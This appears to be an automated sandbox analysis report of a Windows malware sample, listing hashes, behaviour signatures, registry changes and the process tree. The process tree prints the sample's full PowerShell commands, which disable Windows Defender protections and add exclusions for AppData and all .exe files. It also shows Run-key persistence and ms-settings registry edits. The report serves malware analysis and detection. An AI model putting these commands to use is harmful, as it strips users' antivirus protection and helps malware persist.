Analysis
-
max time kernel
144s -
max time network
146s -
platform
windows7_x64 -
resource
win7-20240508-en -
resource tags
arch:x64arch:x86image:win7-20240508-enlocale:en-usos:windows7-x64system -
submitted
29-06-2024 01:58
Behavioral task
behavioral1
Sample
fdc933b64df0832a1f88f0e19a4cab67fb110d54c4913367a7215d7890f8a5b7.exe
Resource
win7-20240508-en
General
-
Target
fdc933b64df0832a1f88f0e19a4cab67fb110d54c4913367a7215d7890f8a5b7.exe
-
Size
405KB
-
MD5
c4e10100c5cf7bec2d9d0a1d7203ddb2
-
SHA1
24a6ecd52fb2165b8563a2853898316851638871
-
SHA256
fdc933b64df0832a1f88f0e19a4cab67fb110d54c4913367a7215d7890f8a5b7
-
SHA512
ff6bd9bdcb95641c5e19aeef99d9cdddb33b5b309ec358a1a50ba00d2cea9a3fa22a0239b4e09d4a8904d4b7f470bbc621d5e0d60331bc5800709d308faf3202
-
SSDEEP
6144:0NYzj2jBoO33tq6qbXaYBc1g5aN9KBBBBBBByygHG/bZbYdNpmIU:eYzAq81g5aN+BoKD
Malware Config
Signatures
-
Command and Scripting Interpreter: PowerShell 1 TTPs 4 IoCs
Run Powershell to modify Windows Defender settings to add exclusions for file extensions, paths, and processes.
Processes:
powershell.exepowershell.exepowershell.exepowershell.exepid process 276 powershell.exe 1568 powershell.exe 2736 powershell.exe 2680 powershell.exe -
Adds Run key to start application 2 TTPs 1 IoCs
Processes:
fdc933b64df0832a1f88f0e19a4cab67fb110d54c4913367a7215d7890f8a5b7.exedescription ioc process Set value (str) \REGISTRY\USER\S-1-5-21-3691908287-3775019229-3534252667-1000\Software\Microsoft\Windows\CurrentVersion\Run\JkanJjJrabo = "C:\\Users\\Admin\\AppData\\Local\\Temp\\fdc933b64df0832a1f88f0e19a4cab67fb110d54c4913367a7215d7890f8a5b7.exe" fdc933b64df0832a1f88f0e19a4cab67fb110d54c4913367a7215d7890f8a5b7.exe -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
Modifies registry class 9 IoCs
Processes:
fdc933b64df0832a1f88f0e19a4cab67fb110d54c4913367a7215d7890f8a5b7.exedescription ioc process Key created \REGISTRY\USER\S-1-5-21-3691908287-3775019229-3534252667-1000_CLASSES\ms-settings\shell fdc933b64df0832a1f88f0e19a4cab67fb110d54c4913367a7215d7890f8a5b7.exe Key created \REGISTRY\USER\S-1-5-21-3691908287-3775019229-3534252667-1000_CLASSES\ms-settings\shell\open fdc933b64df0832a1f88f0e19a4cab67fb110d54c4913367a7215d7890f8a5b7.exe Key deleted \REGISTRY\USER\S-1-5-21-3691908287-3775019229-3534252667-1000_CLASSES\ms-settings\shell\open\command fdc933b64df0832a1f88f0e19a4cab67fb110d54c4913367a7215d7890f8a5b7.exe Key deleted \REGISTRY\USER\S-1-5-21-3691908287-3775019229-3534252667-1000_CLASSES\ms-settings\shell\open fdc933b64df0832a1f88f0e19a4cab67fb110d54c4913367a7215d7890f8a5b7.exe Key deleted \REGISTRY\USER\S-1-5-21-3691908287-3775019229-3534252667-1000_CLASSES\ms-settings fdc933b64df0832a1f88f0e19a4cab67fb110d54c4913367a7215d7890f8a5b7.exe Key created \REGISTRY\USER\S-1-5-21-3691908287-3775019229-3534252667-1000_CLASSES\ms-settings\shell\open\command fdc933b64df0832a1f88f0e19a4cab67fb110d54c4913367a7215d7890f8a5b7.exe Key created \REGISTRY\USER\S-1-5-21-3691908287-3775019229-3534252667-1000_CLASSES\ms-settings fdc933b64df0832a1f88f0e19a4cab67fb110d54c4913367a7215d7890f8a5b7.exe Set value (str) \REGISTRY\USER\S-1-5-21-3691908287-3775019229-3534252667-1000_CLASSES\ms-settings\shell\open\command\ fdc933b64df0832a1f88f0e19a4cab67fb110d54c4913367a7215d7890f8a5b7.exe Key deleted \REGISTRY\USER\S-1-5-21-3691908287-3775019229-3534252667-1000_CLASSES\ms-settings\shell fdc933b64df0832a1f88f0e19a4cab67fb110d54c4913367a7215d7890f8a5b7.exe -
Suspicious behavior: EnumeratesProcesses 7 IoCs
Processes:
fdc933b64df0832a1f88f0e19a4cab67fb110d54c4913367a7215d7890f8a5b7.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepid process 1904 fdc933b64df0832a1f88f0e19a4cab67fb110d54c4913367a7215d7890f8a5b7.exe 2856 powershell.exe 2608 powershell.exe 2736 powershell.exe 276 powershell.exe 1568 powershell.exe 2680 powershell.exe -
Suspicious use of AdjustPrivilegeToken 7 IoCs
Processes:
fdc933b64df0832a1f88f0e19a4cab67fb110d54c4913367a7215d7890f8a5b7.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exedescription pid process Token: SeDebugPrivilege 1904 fdc933b64df0832a1f88f0e19a4cab67fb110d54c4913367a7215d7890f8a5b7.exe Token: SeDebugPrivilege 2856 powershell.exe Token: SeDebugPrivilege 2608 powershell.exe Token: SeDebugPrivilege 2736 powershell.exe Token: SeDebugPrivilege 276 powershell.exe Token: SeDebugPrivilege 1568 powershell.exe Token: SeDebugPrivilege 2680 powershell.exe -
Suspicious use of SetWindowsHookEx 1 IoCs
Processes:
fdc933b64df0832a1f88f0e19a4cab67fb110d54c4913367a7215d7890f8a5b7.exepid process 1904 fdc933b64df0832a1f88f0e19a4cab67fb110d54c4913367a7215d7890f8a5b7.exe -
Suspicious use of WriteProcessMemory 24 IoCs
Processes:
fdc933b64df0832a1f88f0e19a4cab67fb110d54c4913367a7215d7890f8a5b7.execmd.execmd.exedescription pid process target process PID 1904 wrote to memory of 2980 1904 fdc933b64df0832a1f88f0e19a4cab67fb110d54c4913367a7215d7890f8a5b7.exe cmd.exe PID 1904 wrote to memory of 2980 1904 fdc933b64df0832a1f88f0e19a4cab67fb110d54c4913367a7215d7890f8a5b7.exe cmd.exe PID 1904 wrote to memory of 2980 1904 fdc933b64df0832a1f88f0e19a4cab67fb110d54c4913367a7215d7890f8a5b7.exe cmd.exe PID 1904 wrote to memory of 2560 1904 fdc933b64df0832a1f88f0e19a4cab67fb110d54c4913367a7215d7890f8a5b7.exe cmd.exe PID 1904 wrote to memory of 2560 1904 fdc933b64df0832a1f88f0e19a4cab67fb110d54c4913367a7215d7890f8a5b7.exe cmd.exe PID 1904 wrote to memory of 2560 1904 fdc933b64df0832a1f88f0e19a4cab67fb110d54c4913367a7215d7890f8a5b7.exe cmd.exe PID 2980 wrote to memory of 2736 2980 cmd.exe powershell.exe PID 2980 wrote to memory of 2736 2980 cmd.exe powershell.exe PID 2980 wrote to memory of 2736 2980 cmd.exe powershell.exe PID 2560 wrote to memory of 2856 2560 cmd.exe powershell.exe PID 2560 wrote to memory of 2856 2560 cmd.exe powershell.exe PID 2560 wrote to memory of 2856 2560 cmd.exe powershell.exe PID 2560 wrote to memory of 2608 2560 cmd.exe powershell.exe PID 2560 wrote to memory of 2608 2560 cmd.exe powershell.exe PID 2560 wrote to memory of 2608 2560 cmd.exe powershell.exe PID 2560 wrote to memory of 276 2560 cmd.exe powershell.exe PID 2560 wrote to memory of 276 2560 cmd.exe powershell.exe PID 2560 wrote to memory of 276 2560 cmd.exe powershell.exe PID 2560 wrote to memory of 1568 2560 cmd.exe powershell.exe PID 2560 wrote to memory of 1568 2560 cmd.exe powershell.exe PID 2560 wrote to memory of 1568 2560 cmd.exe powershell.exe PID 2560 wrote to memory of 2680 2560 cmd.exe powershell.exe PID 2560 wrote to memory of 2680 2560 cmd.exe powershell.exe PID 2560 wrote to memory of 2680 2560 cmd.exe powershell.exe -
Uses Task Scheduler COM API 1 TTPs
The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.
Processes
-
C:\Users\Admin\AppData\Local\Temp\fdc933b64df0832a1f88f0e19a4cab67fb110d54c4913367a7215d7890f8a5b7.exe"C:\Users\Admin\AppData\Local\Temp\fdc933b64df0832a1f88f0e19a4cab67fb110d54c4913367a7215d7890f8a5b7.exe"1⤵
- Adds Run key to start application
- Modifies registry class
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of SetWindowsHookEx
- Suspicious use of WriteProcessMemory
PID:1904 -
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k start /b powershell -inputformat none -outputformat none -NonInteractive -Command Add-MpPreference -ExclusionPath C:\Users\Admin\AppData\Local\Temp\fdc933b64df0832a1f88f0e19a4cab67fb110d54c4913367a7215d7890f8a5b7.exe & exit2⤵
- Suspicious use of WriteProcessMemory
PID:2980 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -inputformat none -outputformat none -NonInteractive -Command Add-MpPreference -ExclusionPath C:\Users\Admin\AppData\Local\Temp\fdc933b64df0832a1f88f0e19a4cab67fb110d54c4913367a7215d7890f8a5b7.exe3⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:2736 -
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k start /b powershell.exe Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 2 & powershell.exe -inputformat none -outputformat none -NonInteractive -Command "Add-MpPreference -ExclusionPath %USERPROFILE%\AppData" & powershell.exe -inputformat none -outputformat none -NonInteractive -Command "Add-MpPreference -ExclusionPath %USERPROFILE%\Local" & powershell.exe -command "Set-MpPreference -ExclusionExtension '.exe'" & exit2⤵
- Suspicious use of WriteProcessMemory
PID:2560 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell.exe Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend3⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:2856 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell Set-MpPreference -SubmitSamplesConsent 23⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:2608 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell.exe -inputformat none -outputformat none -NonInteractive -Command "Add-MpPreference -ExclusionPath C:\Users\Admin\AppData"3⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:276 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell.exe -inputformat none -outputformat none -NonInteractive -Command "Add-MpPreference -ExclusionPath C:\Users\Admin\Local"3⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:1568 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell.exe -command "Set-MpPreference -ExclusionExtension '.exe'"3⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:2680
Network
MITRE ATT&CK Enterprise v15
Replay Monitor
Loading Replay Monitor...
Downloads
-
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-ms
Filesize7KB
MD57cedbe448585e24df571f62dad6af14e
SHA1b4fbb0810daa982975c72b2962086a7ce8870f84
SHA256990495ff8e54a2865c814770ed0313879fa08db7388f245273490e71f2be35f0
SHA51289c9f203e193a66b13936207fb47d2587e3f9b223c987801e720d014131fe03c340b698761bee9a53db3be8ffb8a1858eea5816f9a1bedb7e5320c450532e23f
-
MD5
d41d8cd98f00b204e9800998ecf8427e
SHA1da39a3ee5e6b4b0d3255bfef95601890afd80709
SHA256e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855
SHA512cf83e1357eefb8bdf1542850d66d8007d620e4050b5715dc83f4a921d36ce9ce47d0d13c5d85f2b0ff8318d2877eec2f63b931bd47417a81a538327af927da3e